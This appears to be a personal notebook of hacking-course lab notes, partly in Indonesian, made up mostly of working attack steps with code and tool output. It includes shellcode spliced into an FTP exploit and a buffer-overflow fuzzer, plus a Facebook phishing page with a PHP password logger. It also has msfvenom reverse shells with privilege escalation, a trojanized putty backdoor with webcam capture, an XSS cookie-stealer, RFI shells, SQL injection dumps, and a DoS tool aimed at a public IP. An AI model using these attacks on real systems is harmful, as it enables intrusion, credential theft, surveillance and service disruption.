XCode

No t e b o o k: nbctcp's notebook
Cre at e d : 12-Jan-17 10:20 PM U p d at e d : 29-Jan-17 5:26 AM
A u t h o r: Nbctcp Bo
T ag s: Hack
URL: http://xcode.or.id/professional/

-to learn hacking, search in Google "DVWA"

Damn Vulnerability Web App

-to brute force facebook using dictionary. Need FireForce plugin in FireFox

-to retrieve browser password

https://github.com/AlessandroZ/LaZagne

CMD> tasklist
CMD> taskkill

-google search whatsapp meterpreter

-cloudfare, service untuk mencegah DDOS
-encode/decode beda dng encrypt/decrypt

QUESTIONS:
-virtualbox remote display multiple connection
-adding new metasploit module

-installing kali on ubuntu

-putty using tor network

LAB 3-1 WIN10 Mon 23/1

-search hole
# nmap -sS -sV -O 192.168.1.159
PORT STATE SERVICE VERSION
21/tcp open ftp Easy File Sharing ftpd
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
990/tcp open ssl/ftp Easy File Sharing ftpd
MAC Address: 08:00:27:7B:C1:87 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Microsoft Windows 10
OS CPE: cpe:/o:microsoft:windows_10
OS details: Microsoft Windows 10 build 10074 - 10586
Network Distance: 1 hop
Service Info: Host: DESKTOP-CD3JGJF; OS: Windows; CPE: cpe:/o:microsoft:windows

p search in exploit-db Easy File Sharing ftpd hole

VM: WIN10.vdi
STATUS:
https://www.exploit-db.com/exploits/33538/
# wget https://www.exploit-db.com/download/33538
# vi 33538
change ip address in here to your target ip which is 192.168.1.159
s.connect(("192.168.1.159", 21))
:wq!
-because 33538 only to run calculator, we need to change its payload with payload from https://www.exploit-db.com/exploits/20876/
# wget https://www.exploit-db.com/download/20876
# vi 20876
copy this part
"\xda\xc5\xd9\x74\x24\xf4\x2b\xc9\xba\x3a\x04\xcc\xb6\x5e".
"\xb1\x56\x31\x56\x19\x83\xee\xfc\x03\x56\x15\xd8\xf1\x30".
"\x5e\x95\xfa\xc8\x9f\xc5\x73\x2d\xae\xd7\xe0\x25\x83\xe7".
"\x63\x6b\x28\x8c\x26\x98\xbb\xe0\xee\xaf\x0c\x4e\xc9\x9e".
"\x8d\x7f\xd5\x4d\x4d\x1e\xa9\x8f\x82\xc0\x90\x5f\xd7\x01".
"\xd4\x82\x18\x53\x8d\xc9\x8b\x43\xba\x8c\x17\x62\x6c\x9b".
"\x28\x1c\x09\x5c\xdc\x96\x10\x8d\x4d\xad\x5b\x35\xe5\xe9".
"\x7b\x44\x2a\xea\x40\x0f\x47\xd8\x33\x8e\x81\x11\xbb\xa0".
"\xed\xfd\x82\x0c\xe0\xfc\xc3\xab\x1b\x8b\x3f\xc8\xa6\x8b".
"\xfb\xb2\x7c\x1e\x1e\x14\xf6\xb8\xfa\xa4\xdb\x5e\x88\xab".
"\x90\x15\xd6\xaf\x27\xfa\x6c\xcb\xac\xfd\xa2\x5d\xf6\xd9".
"\x66\x05\xac\x40\x3e\xe3\x03\x7d\x20\x4b\xfb\xdb\x2a\x7e".
"\xe8\x5d\x71\x17\xdd\x53\x8a\xe7\x49\xe4\xf9\xd5\xd6\x5e".
"\x96\x55\x9e\x78\x61\x99\xb5\x3c\xfd\x64\x36\x3c\xd7\xa2".
"\x62\x6c\x4f\x02\x0b\xe7\x8f\xab\xde\xa7\xdf\x03\xb1\x07".
"\xb0\xe3\x61\xef\xda\xeb\x5e\x0f\xe5\x21\xe9\x08\x2b\x11".
"\xb9\xfe\x4e\xa5\x2f\xa2\xc7\x43\x25\x4a\x8e\xdc\xd2\xa8".
"\xf5\xd4\x45\xd3\xdf\x48\xdd\x43\x57\x87\xd9\x6c\x68\x8d".
"\x49\xc1\xc0\x46\x1a\x09\xd5\x77\x1d\x04\x7d\xf1\x25\xce".
"\xf7\x6f\xe7\x6f\x07\xba\x9f\x0c\x9a\x21\x60\x5b\x87\xfd".
"\x37\x0c\x79\xf4\xd2\xa0\x20\xae\xc0\x39\xb4\x89\x41\xe5".
"\x05\x17\x4b\x68\x31\x33\x5b\xb4\xba\x7f\x0f\x68\xed\x29".
"\xf9\xce\x47\x98\x53\x98\x34\x72\x34\x5d\x77\x45\x42\x62".
"\x52\x33\xaa\xd2\x0b\x02\xd4\xda\xdb\x82\xad\x07\x7c\x6c".
"\x64\x8c\x8c\x27\x25\xa4\x04\xee\xbf\xf5\x48\x11\x6a\x39".
"\x75\x92\x9f\xc1\x82\x8a\xd5\xc4\xcf\x0c\x05\xb4\x40\xf9".
"\x29\x6b\x60\x28\x23"

# pico 33538
delete this part
"\xd9\xcb\xbe\xb9\x23\x67\x31\xd9\x74\x24\xf4\x5a\x29\xc9" +
"\xb1\x13\x31\x72\x19\x83\xc2\x04\x03\x72\x15\x5b\xd6\x56" +
"\xe3\xc9\x71\xfa\x62\x81\xe2\x75\x82\x0b\xb3\xe1\xc0\xd9" +
"\x0b\x61\xa0\x11\xe7\x03\x41\x84\x7c\xdb\xd2\xa8\x9a\x97" +
"\xba\x68\x10\xfb\x5b\xe8\xad\x70\x7b\x28\xb3\x86\x08\x64" +
"\xac\x52\x0e\x8d\xdd\x2d\x3c\x3c\xa0\xfc\xbc\x82\x23\xa8" +
"\xd7\x94\x6e\x23\xd9\xe3\x05\xd4\x05\xf2\x1b\xe9\x09\x5a" +
"\x1c\x39\xbd"

and replace with 20876 PAYLOAD

"\xda\xc5\xd9\x74\x24\xf4\x2b\xc9\xba\x3a\x04\xcc\xb6\x5e" +
"\xb1\x56\x31\x56\x19\x83\xee\xfc\x03\x56\x15\xd8\xf1\x30" +
"\x5e\x95\xfa\xc8\x9f\xc5\x73\x2d\xae\xd7\xe0\x25\x83\xe7" +
"\x63\x6b\x28\x8c\x26\x98\xbb\xe0\xee\xaf\x0c\x4e\xc9\x9e" +
"\x8d\x7f\xd5\x4d\x4d\x1e\xa9\x8f\x82\xc0\x90\x5f\xd7\x01" +
"\xd4\x82\x18\x53\x8d\xc9\x8b\x43\xba\x8c\x17\x62\x6c\x9b" +
"\x28\x1c\x09\x5c\xdc\x96\x10\x8d\x4d\xad\x5b\x35\xe5\xe9" +
"\x7b\x44\x2a\xea\x40\x0f\x47\xd8\x33\x8e\x81\x11\xbb\xa0" +
"\xed\xfd\x82\x0c\xe0\xfc\xc3\xab\x1b\x8b\x3f\xc8\xa6\x8b" +
"\xfb\xb2\x7c\x1e\x1e\x14\xf6\xb8\xfa\xa4\xdb\x5e\x88\xab" +
"\x90\x15\xd6\xaf\x27\xfa\x6c\xcb\xac\xfd\xa2\x5d\xf6\xd9" +
"\x66\x05\xac\x40\x3e\xe3\x03\x7d\x20\x4b\xfb\xdb\x2a\x7e" +
"\xe8\x5d\x71\x17\xdd\x53\x8a\xe7\x49\xe4\xf9\xd5\xd6\x5e" +
"\x96\x55\x9e\x78\x61\x99\xb5\x3c\xfd\x64\x36\x3c\xd7\xa2" +
"\x62\x6c\x4f\x02\x0b\xe7\x8f\xab\xde\xa7\xdf\x03\xb1\x07" +
"\xb0\xe3\x61\xef\xda\xeb\x5e\x0f\xe5\x21\xe9\x08\x2b\x11" +
"\xb9\xfe\x4e\xa5\x2f\xa2\xc7\x43\x25\x4a\x8e\xdc\xd2\xa8" +
"\xf5\xd4\x45\xd3\xdf\x48\xdd\x43\x57\x87\xd9\x6c\x68\x8d" +
"\x49\xc1\xc0\x46\x1a\x09\xd5\x77\x1d\x04\x7d\xf1\x25\xce" +
"\xf7\x6f\xe7\x6f\x07\xba\x9f\x0c\x9a\x21\x60\x5b\x87\xfd" +
"\x37\x0c\x79\xf4\xd2\xa0\x20\xae\xc0\x39\xb4\x89\x41\xe5" +
"\x05\x17\x4b\x68\x31\x33\x5b\xb4\xba\x7f\x0f\x68\xed\x29" +
"\xf9\xce\x47\x98\x53\x98\x34\x72\x34\x5d\x77\x45\x42\x62" +
"\x52\x33\xaa\xd2\x0b\x02\xd4\xda\xdb\x82\xad\x07\x7c\x6c" +
"\x64\x8c\x8c\x27\x25\xa4\x04\xee\xbf\xf5\x48\x11\x6a\x39" +
"\x75\x92\x9f\xc1\x82\x8a\xd5\xc4\xcf\x0c\x05\xb4\x40\xf9" +
"\x29\x6b\x60\x28\x23"

NOTE:
-kali linux 2u2 ga bisa di VirtualBox karena akan error
-vista dan 2008 harus di VMware kalau di attack pakai MS09-050, kalau pakai VirtualBox blue screen (tested wrong)
-di metasploit, beda shell dan meterpreter adalah shell hanya command DOS, meterpreter bisa upload, download, run webcam etc

p390 Eploit development

STATUS:
VM: WINXP
-on WINXP
run D:\dataa\freefloatftpserver-list bof\Win32\FTPServer
-from kali
# nmap -A 192.168.1.106
we found ftp server running
-close ftp server
-on XP run Immunity Debugger
open D:\dataa\freefloatftpserver-list bof\Win32\FTPServer

-create fuzzer.py
#!/usr/bin/python
import socket
ipaddress = "192.168.1.106"
paket = 200
commanduserftp = "\x41" * (paket)
commandpassftp = "anonymous"
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((str(ipaddress),21))
print s.recv(1024)
s.send("USER "+commanduserftp+"\r\n")
print s.recv(1024)
s.send("PASS "+commandpassftp+"\r\n")
s.close()

...
...

# locate pattern_create.rb
/usr/share/metasploit-framework/tools/exploit/pattern_create.rb
# /usr/share/metasploit-framework/tools/exploit/pattern_create.rb 1000
or in Kali2 use
# /usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 1000
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae

copy above and paste into

follow p400

25/1
NOTE:
turn off DeepFreeze in XP vm by typing Ctrl+Alt+Shift+F6, then click Boot Thawed. Password pentium2

p500 DOS
STATUS:
VM:

p522 Capture ftp password

STATUS: OK
VM: KALI XP XPSP2

p534 Fake Facebook

STATUS: IN PROGRESS
VM: KALI XPSP3
In KALI:
-add "*.com A 192.168.1.103" into /etc/ettercap/etter.dns
# nano /etc/ettercap/etter.dns
*.com A 192.168.1.103
-run ettercap
# ettercap -G
click menu Hosts/Scan for hosts
click Hosts/Hosts list
click 192.168.1.1, click Add to Target 1
click 192.168.1.110, click Add to Target 2
NOTE: 192.168.1.1 Gateway
192.168.1.110 Client
-put fbrun.php into /var/www/html/
# cat /var/www/html/fbrun.php
<?php $file = "facebook.txt";
$username = $_POST['email'];
$password = $_POST['pass'];
$ip = $_SERVER['REMOTE_ADDR'];
$today = date("F j, Y, g:i a");
$handle = fopen($file, 'a');
fwrite($handle, "++++++++++++++++++++++++++++++++++++++++++++++++++ ++");
fwrite($handle, "\n");
fwrite($handle, "Email: ");
fwrite($handle, "$username");
fwrite($handle, "\n");
fwrite($handle, "Password: ");
fwrite($handle, "$password");
fwrite($handle, "\n");
fwrite($handle, "IP Address: ");
fwrite($handle, "$ip");
fwrite($handle, "\n");
fwrite($handle, "Date Submitted: ");
fwrite($handle, "$today");
fwrite($handle, "\n");
fwrite($handle, "++++++++++++++++++++++++++++++++++++++++++++++++++ ++");
fwrite($handle, "\n");
fwrite($handle, "\n");
fclose($handle);
echo "<script LANGUAGE=\"JavaScript\">
<!--
window.location=\"https://login.facebook.com/login.php?login_attempt=1\";
// -->
</script>";
?>
-create facebook login page
open facebook.com in Firefox and Save Page and choose "Web Page, HTML only" and save as index.html
open index.html using leafpad
search for "action=" then find
https://www.facebook.com/login.php?login_attempt=1&amp;lwv=110
replace with
fbrun.php then save
put index.html into your kali webserver
# mv /root/index.html /var/www/html/

p541 SSLStrip
STATUS:
VM: KALI

p586 HeartBleed
STATUS: OK -> need many login activity so that we can capture the password
VM: KALI UBUNTU13.04.vdi

p593 Cookie
STATUS: OK
VM: WIN7 XPSP2 XP
WIN7=hacker, XPSP2=web server, XP=target

-in XPSP2, WordPress automatically start, , you can proof it by typing http://localhost/blog/wordpress/
-in WIN7 make sure have FireFox ESR with GreaseMonkey plugin
after enable GreaseMonkey plugin install http://userscripts-mirror.org/scripts/show/119798
install Cain&Abel
install WireShark and enable nic Promiscuous Mode: Allow All in VirtualBox
-to change WordPress ip in XPSP2
go to http://localhost/phpmyadmin
L: root
P:
click WordPress on the left bar
click wp_options
click Browse
click Edit on siteurl
change ip there
click on Save\Go
-server WordPress running in XPSP2

-hacker WIN7
run cainabel
click Sniffer
click Host at the bottom
right click/Scan MAC Addresses
click bottom APR
click activate top APR
click top right box
click top +
on the left click user ip i.e 192.168.1.109
on the right click wordpress server ip i.e 192.168.1.111

make sure top nic and ARP icon on

run WireShark
click 2x Local Area Connection
in filter type http.cookie
-user in XP
run any browser
go to http://localhost/blog/wordpress/wp-login.php
L: admin
P: baseball
-hacker in WIN7
copy selected cookie like this

open FireFox with GreaseMonkey

go to
press Alt-c and paste cookie
click OK
click refresh

p604-611
STATUS:
VM: KALI XPSP3
Client side attack

p616 Adobe Acrobat attack

STATUS:
VM: KALI XPSP3

p624-631 Brute force

STATUS:
VM: KALI2

p712 John the Ripper and pwdump7

STATUS:
VM: KALI WIN7 (JTR builtin in kali. pwdump need to be installed)

p719 MSFVENOM WIN7

STATUS: OK
VM: KALI WIN7
-in KALI
# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.105 LPORT=4444 -f exe > WIN7.exe
copy WIN7.exe to target WIN7
# msfconsole
> use exploit/multi/handler
> set payload windows/meterpreter/reverse_tcp
> set lhost 192.168.1.105
> set lport 4444
> run
-in WIN7
run WIN7.exe
-in KALI
meterpreter > getuid
Server username: windows7-PC\windows7
meterpreter > getsystem
[-] priv_elevate_getsystem: Operation failed: Access is denied. The following was attempted:
[-] Named Pipe Impersonation (In Memory/Admin)
[-] Named Pipe Impersonation (Dropper/Admin)
[-] Token Duplication (In Memory/Admin)
meterpreter > background
[*] Backgrounding session 1...
msf exploit(handler) > search ms16_016
Matching Modules
================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
exploit/windows/local/ms16_016_webdav 2016-02-09 excellent MS16-016 mrxdav.sys WebDav Local Privilege Escalation
msf exploit(handler) > use exploit/windows/local/ms16_016_webdav
msf exploit(ms16_016_webdav) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(ms16_016_webdav) > set lhost 192.168.1.105
lhost => 192.168.1.105
msf exploit(ms16_016_webdav) > set lport 4444
lport => 4444
msf exploit(ms16_016_webdav) > set session 1
session => 1
msf exploit(ms16_016_webdav) > run
[*] Started reverse TCP handler on 192.168.1.105:4444
[*] Launching notepad to host the exploit...
[+] Process 2164 launched.
[*] Reflectively injecting the exploit DLL into 2164...
[*] Exploit injected ... injecting payload into 2164...
[*] Done. Verify privileges manually or use 'getuid' if using meterpreter to verify exploitation.
> run
> getuid
Server username: NT AUTHORITY\SYSTEM

p722 MSFVENOM WIN8.1

STATUS: OK
VM: KALI WIN8.1
-in KALI
# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.105 LPORT=4444 -f exe > WIN81.exe
upload WIN81.exe to target WIN81 vm
# msfconsole
> use exploit/multi/handler
> set payload windows/meterpreter/reverse_tcp
> set lhost 192.168.1.104
> set lport 4444
> run
[*] Started reverse TCP handler on 192.168.1.104:4444
[*] Starting the payload handler...
[*] Sending stage (957487 bytes) to 192.168.1.129
[*] Meterpreter session 1 opened (192.168.1.104:4444 -> 192.168.1.129:49426) at 2017-01-26 20:07:32 -0500
meterpreter > background
[*] Backgrounding session 1...
msf exploit(handler) > search ms15 -078
manual MS15-078 Microsoft Windows Font Driver Buffer Overflow
exploit/windows/local/ntapphelpcachecontrol 2014-09-30
> use exploit/windows/local/ntapphelpcachecontrol
> set session 1
> set lhost 192.168.1.104
> set lport 4444
> run
[*] Started reverse TCP handler on 192.168.1.104:4444
[*] Uploading the payload DLL
[*] Payload DLL will be: C:\Users\data\AppData\Local\Temp\foZZEu.dll
[*] Injecting exploit into PID 5968
[*] Creating thread
[*] Sending stage (957487 bytes) to 192.168.1.129
[*] Meterpreter session 2 opened (192.168.1.104:4444 -> 192.168.1.129:49427) at 2017-01-26 20:09:38 -0500
meterpreter > getuid
Server username: pcwindows\data
> getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
> getuid
Server username: NT AUTHORITY\SYSTEM
> sysinfo
Computer : PCWINDOWS
OS : Windows 8.1 (Build 9600).
Architecture : x86
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x86/win32
> pwd
C:\Windows\system32
> shell
Process 2216 created.
Channel 1 created.
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.
>net user nawir Baseball12 /add
net user nawir Baseball12 /add
The command completed successfully.
>net localgroup administrators nawir /add
net localgroup administrators nawir /add
The command completed successfully.
> exit
> run vnc

p725 Hercules (remote exploit to bypass WIN10 MS Defender. Can be detected by TrendMicro)
STATUS:
VM: KALI WIN10
# cd /opt
# git clone https://github.com/EgeBalci/HERCULES
-in MIrc to check who in channel Yogyakarta who has ip start with ip 180
/who #yogyakarta *!*@125.*
now

p506 Yersinia
STATUS:
VM: KALI WIN7

p730 Backdoor using kali

STATUS: OK
VM: KALI2 WIN7
WEAKNESS: camera light will on
download putty.exe
# msfvenom -p windows/meterpreter/reverse_tcp -f exe -e x86/shikata_ga_nai -i 1 -k -x /root/putty.exe LHOST=192.168.1.103 LPORT=4444 > puttycam.exe
send puttycam.exe to target
run listening
# msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.1.103
set lport 4444
run
-in WIN7 target
open puttycam.exe
-in KALI
after connected do
> ps aux
find explorer.exe psid for example 2540
> migrate 2540
> run persistence -U -i 5 -p 4444 -r 192.168.1.103
NOTE: persistence above still problem when target reboot
> run webcam
to capture snapshoot
> webcam_snap

p731 Android backdoor

VM: KALI2.1 WIN7
STATUS: need to be tested
guru forget what files needed to make it run

p755 MySQL Basic

STATUS:
VM:

p784 Google Hacking

STATUS:
VM:
intext:password of: site:ac.id filetype:pdf
of: mean folder
to search robot
intext:"admin|login" inurl:robots.txt site:go.id

p788 DIRBUSTER
Wordlist.txt here is find filename inside wordlist.txt

p824 XSS
STATUS: OK
VM: WINXPSP2
-in WINXPSP2
-Webserver in WINXPSP2 running automatically on startup
open web browser
go to http://192.168.1.32/blogphp
test xss injection
http://192.168.1.32/blogphp/index.php?search=%22%3E%3C/title%3E%3Cmarquee%20b
gcolor=%22red%22%3E%3CH2%3EKurniawan%20ganteng%3C/H2%3E%3C/marquee %3E
result

http://192.168.1.32/blogphp/index.php?search=%22%3E%3C/TITLE%3E%3CIFRAME%2 0src=http://xcode.or.id%3E%3CIFRAME%3E
result

p825 Wapiti
STATUS:
VM: KALI XPSP2
-in KALI
# wapiti http://192.168.1.111/wcms

p829 XSS Persistent

p830Ultra Light forum

STATUS: Not working in KALI2.2 because log.txt owner is www-data not root. need to test using KALI2.0
VM: KALI XPSP2
-in KALI
put scriptcookie.php into /var/www/html
# chmod
go to http://192.168.111/forum
click Want to start
click Create Topic

To test whether this Message box xss vulnerable, we need to test using script
click Settings

click Profile
back to Settings to apply real script
paste below script
script>document.write('<img src="http://192.168.1.105/scriptcokie.php?cookie=' + document.cookie + '" />')</script>
click Update
click Profile

p834 Tamper Data firefox extension

STATUS: IN PROGRESS
VM: XPSP2
put uploadaja into apache html folder

-in KALI
open FireFox and install Tamper Data plugin
open

p853 LFI
STATUS:
VM: XPSP2
-in XPSP2
open firefox
go to http://localhost/blog/wordpress/wp-content/plugins/wp-custom-pages/wp-download.php?url=..%2f..%2f..%2fwp-config.php

p857 RFI
STATUS:
VM: KALI XPSP2
-in XPSP2
test wordpress running by go to http://192.168.1.111/blog/wordpress/
-in KALI
copy shell.txt into /var/www/html
# wpscan http://192.168.1.111/blog/wordpress/
open firefox and go to
http://192.168.1.111/blog/wordpress/wp-content/plugins/annonces/includes/lib/photo/uploadPhoto.php?abspath=http://192.168.1.108/shell.txt?

# wapiti http://192.168.1.32/sinaraccounting
Remote inclusion vulnerability in http://192.168.1.32/sinaraccounting/index.php via injection in the parameter accounting
Evil url: http://192.168.1.32/sinaraccounting/index.php?accounting=http%3A%2F%2Fwww.google.fr%2F%3F
open browser go to
http://192.168.1.32/sinaraccounting/index.php?accounting=http://192.168.1.108/shell.txt?
LAB Extra
STATUS: OK
VM: KALI WINXPSP2
-in KALI
# wapiti http://192.168.1.32/data
Referer: http://192.168.1.32/data/view.php?postid=1
Content-Type: application/x-www-form-urlencoded
nama=default&email=default&website=default&komentar=%3Cscript%3Ealert%28%27wapkdv40pk%27%29%3C%2Fscript%3E&id=1&kirim=Kirim%21
[+] Launching module blindsql
Blind SQL vulnerability in http://192.168.1.32/data/login.php via injection in the query string
Evil url: http://192.168.1.32/data/login.php?%22%20or%20sleep%287%29%3D%22
Blind SQL vulnerability in http://192.168.1.32/data/insert.mhs.php via injection in the query string
Evil url: http://192.168.1.32/data/insert.mhs.php?sleep%287%29%231

-in WINXPSP2
run Hafij
click Tables
click Get Tables
check tbl_user
click Get Column

tick column username and password

click Get Data
copy hash password
click MD5
paste into MD5 hash
click Start
result in m5decryption.com -> 12345
click Find Admin
click MD5
paste into MD5 hash
click Start
result in m5decryption.com -> 12345
click Find Admin

open browser
go to http://localhost/data/user.php
L: admin
P: 12345

p894 SQLMAP
STATUS:
VM: KALI WINXPSP2
# sqlmap -u http://192.168.1.111/data/view.php?postid=1 -D admin_mhs --tables
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] y
[07:39:45] [INFO] GET parameter 'postid' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'postid' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
web server operating system: Windows
web application technology: PHP 5.2.6, Apache 2.2.9
back-end DBMS: MySQL 5.0.12
[07:40:34] [INFO] fetching tables for database: 'admin_mhs'
Database: admin_mhs
[7 tables]
+---------------------+
| tbl_artikel |
| tbl_cln_mahasiswa |
| tbl_komentar |
| tbl_mhsiswa |
| tbl_nilai_mahasiswa |
| tbl_user |
| tbl_user_profile |
+---------------------+
[07:40:34] [INFO] fetched data logged to text files under '/root/.sqlmap/output/192.168.1.111'

# sqlmap -u http://192.168.1.111/data/view.php?postid=1 -D admin_mhs -T tbl_artikel --column

Database: admin_mhs
Table: tbl_artikel
[6 columns]
+-----------------+--------------+
| Column | Type |
+-----------------+--------------+
| id_artikel | int(5) |
| isi_berita | text |
| judul_berita | varchar(200) |
| penulis | varchar(50) |
| status | varchar(20) |
| tanggal_publish | date |
+-----------------+--------------+

# sqlmap -u http://192.168.1.111/data/view.php?postid=1 -D admin_mhs -T tbl_artikel --dump

Database: admin_mhs
Table: tbl_artikel
[1 entry]
+------------+---------+---------+----------------------+--------------+-----------------+
| id_artikel | status | penulis | isi_berita | judul_berita | tanggal_publish |
+------------+---------+---------+----------------------+--------------+-----------------+
|1 | publish | admin | Seminar Nasional\r\n | Pengumuman | 2010-10-19 |
+------------+---------+---------+----------------------+--------------+-----------------+

# sqlmap -u http://192.168.1.111/data/view.php?postid=1 -D admin_mhs -T tbl_user --dump

do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] n
do you want to crack them via a dictionary-based attack? [Y/n/q] n
Database: admin_mhs
Table: tbl_user
[1 entry]
+---------+---------+----------+----------------------------------+
| id_user | level | username | password |
+---------+---------+----------+----------------------------------+
|1 |2 | admin | 827ccb0eea8a706c4c34a16891f84e7b |
+---------+---------+----------+----------------------------------+

check whether 827ccb0eea8a706c4c34a16891f84e7b is md5 or

# hash-identifier
HASH: 827ccb0eea8a706c4c34a16891f84e7b
Possible Hashs:
[+] MD5
[+] Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))
-decrypt md5 password
# findmyhash MD5 -h 827ccb0eea8a706c4c34a16891f84e7b
***** HASH CRACKED!! *****
The original string is: 12345
You can also crack MD5 online or using

p916 phpMyAdmin attack

STATUS:
NOTES: Attacker WINXPSP2, target UBUNTU10.10
Can only test normal user shell not root. maybe we can use dirty cow
need to
VM: UBUNTU10.10 WINXPSP2
-in UBUNTU10.10
run lampp
# /opt/lampp/lampp start
open browser and go to
http://192.168.1.108/sinaraccounting/

-in WINXPSP2
copy r57.php into E:\xampp\htdocs
install wapiti for windows
> wapiti http://192.168.1.108/sinaraccounting
[+] Launching module file
Remote inclusion vulnerability in http://192.168.1.111/sinaraccounting/index.php via injection in the parameter accounting
Evil url: http://192.168.1.111/sinaraccounting/index.php?accounting=http%3A%2F%2Fwww.google.fr%2F%3F

p956 Antiloris
STATUS:
VM: UBUNTU13.04

p957 SSH Honeypot

STATUS:
VM:

p962 ARPON
STATUS:
VM:

p985 Port Knocking

-sw to bypass login password in mac and win is kon-boot

http://www.piotrbania.com/all/kon-boot/

-vadim is sw to attack target server service till down

NOTE: check from different network, target still run
to compile vadim
# gcc vadimI.c -o vadim
to attack any server port
# ./vadimI 202.160.14.18 80 0
NOTE:
0 above mean unlimited
For Kali1, click No, later we will edit
# nano /etc/apt/sources.list
#old Kali 1.1.0 Repo
deb http://old.kali.org/kali moto main non-free contrib
deb-src http://old.kali.org/kali moto main non-free contrib
deb http://old.kali.org/kali-security moto main non-free contrib
deb-src http://old.kali.org/kali-security moto main non-free contrib
#Debian Backports
deb http://ftp.debian.org/debian wheezy-backports main
###### Debian Main Repos
deb http://ftp.debian.org/debian/ wheezy main contrib non-free
deb-src http://ftp.debian.org/debian/ wheezy main contrib non-free
###### Debian Update Repos
deb http://security.debian.org/ wheezy/updates main contrib non-free
deb http://ftp.debian.org/debian/ wheezy-proposed-updates main contrib non-free
deb-src http://security.debian.org/ wheezy/updates main contrib non-free
deb-src http://ftp.debian.org/debian/ wheezy-proposed-updates main contrib non-free

-update repository
# apt-get clean && apt-get update && apt-get upgrade -y